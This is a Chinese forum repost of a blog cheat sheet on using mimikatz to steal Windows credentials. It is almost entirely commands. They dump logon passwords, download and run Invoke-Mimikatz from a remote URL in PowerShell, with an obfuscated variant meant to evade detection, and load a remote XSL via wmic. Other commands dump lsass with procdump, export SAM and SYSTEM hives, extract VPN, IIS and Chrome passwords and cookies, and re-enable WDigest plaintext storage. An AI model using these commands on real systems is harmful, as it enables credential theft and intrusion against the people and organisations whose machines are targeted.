壹月 發表於 2019-10-2 16:44:00

mimikatz使用笔记

<p>一、获取密码#</p>
<div id="code0">
<div class="cnblogs_Highlighter">
<pre class="brush:php;gutter:true;">privilege::debug
sekurlsa::logonpasswords
mimikatz.exe "sekurlsa::debug" "sekurlsa::logonPasswords full" &gt;&gt;1.txt exit
</pre>
</div>
<p>  一般我会使用bat</p>
<p>@echo off<br>mimikatz.exe privilege::debug sekurlsa::logonpasswords exit&gt;C:\programdata\1.txt</p>
</div>
<p>二、powershell获取密码#</p>
<div id="code1">
<div class="cnblogs_Highlighter">
<pre class="brush:php;gutter:true;">powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
</pre>
</div>
<p>  </p>
</div>
<p>三、混淆#</p>
<div id="code2">
<pre><code class="hljs markdown">powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttps://raw.gith'+'ubus'+'erco'+'ntent.com/matt'+'ife'+'stati'+'on/Power'+'Sploit/ma'+'ster/Exfil'+'tration/Invok'+'e-Mi'+'mikatz.'+'ps11v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').REplaCE('1vc',[<span class="hljs-string">STRing][<span class="hljs-symbol">CHAR]39)|IeX"</span></span></code></pre>
</div>
<p>四、wmic获取密码#</p>
<div id="code3">
<pre><code class="hljs nginx"><span class="hljs-attribute">wmic os get /format:<span class="hljs-string">"https://gist.githubusercontent.com/manasmbellani/7f3e39170f5bc8e3a493c62b80e69427/raw/87550d0fc03023bab99ad83ced657b9ef272a3b2/mimikatz.xsl"</span></span></code></pre>
</div>
<p>五、procdump离线获取密码#</p>
<div id="code4">
<pre><code class="hljs css"><span class="hljs-selector-tag">procdump64<span class="hljs-selector-class">.exe <span class="hljs-selector-tag">-accepteula <span class="hljs-selector-tag">-ma <span class="hljs-selector-tag">lsass<span class="hljs-selector-class">.exe 1<span class="hljs-selector-class">.dmp
<span class="hljs-selector-tag">mimikatz<span class="hljs-selector-class">.exe "<span class="hljs-selector-tag">sekurlsa<span class="hljs-selector-pseudo">::minidump 1<span class="hljs-selector-class">.dmp" "<span class="hljs-selector-tag">sekurlsa<span class="hljs-selector-pseudo">::logonPasswords <span class="hljs-selector-tag">full" <span class="hljs-selector-tag">exit</span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></code></pre>
</div>
<p>六、使用注册表来离线导出Hash#</p>
<div id="code5">
<pre><code class="hljs nginx"><span class="hljs-attribute">reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv
mimikatz.exe <span class="hljs-string">"lsadump::sam /system:system.hiv /sam:sam.hiv" exit</span></span></code></pre>
</div>
<p>七、vpn密码获取#</p>
<div id="code6">
<pre><code class="hljs php">mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets <span class="hljs-keyword">exit vpn</span></code></pre>
</div>
<p>八、读取IIS7配置文件密码#</p>
<div id="code7">
<pre><code class="hljs perl">mimikatz.exe privilege::debug <span class="hljs-keyword">log <span class="hljs-string">"iis::apphost /in:"%systemroot%\system32\inetsrv\config\applicationHost.config<span class="hljs-string">" /live" <span class="hljs-keyword">exit</span></span></span></span></code></pre>
</div>
<p>九、获取浏览器的密码和cookie信息#</p>
<div id="code8">
<pre><code class="hljs perl">mimikatz.exe privilege::debug <span class="hljs-keyword">log <span class="hljs-string">"dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" <span class="hljs-keyword">exit
mimikatz.exe privilege::debug <span class="hljs-keyword">log <span class="hljs-string">"dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\USERDA~1" <span class="hljs-keyword">exit
mimikatz.exe privilege::debug <span class="hljs-keyword">log <span class="hljs-string">"dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1" <span class="hljs-keyword">exit <span class="hljs-comment"># 读chrome密码</span></span></span></span></span></span></span></span></span></span></code></pre>
</div>
<p>十、2012服务器 mimikatz获取密码#</p>
<div id="code9">
<pre><code class="hljs cs">修改注册表
&nbsp; &nbsp; reg <span class="hljs-keyword">add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d <span class="hljs-number">1
服务器锁屏
&nbsp; &nbsp; rundll32.exe user32.dll,LockWorkStation</span></span></code></pre>
</div><br><br>
来源:https://www.cnblogs.com/abubu/p/11617734.html
頁: [1]
查看完整版本: mimikatz使用笔记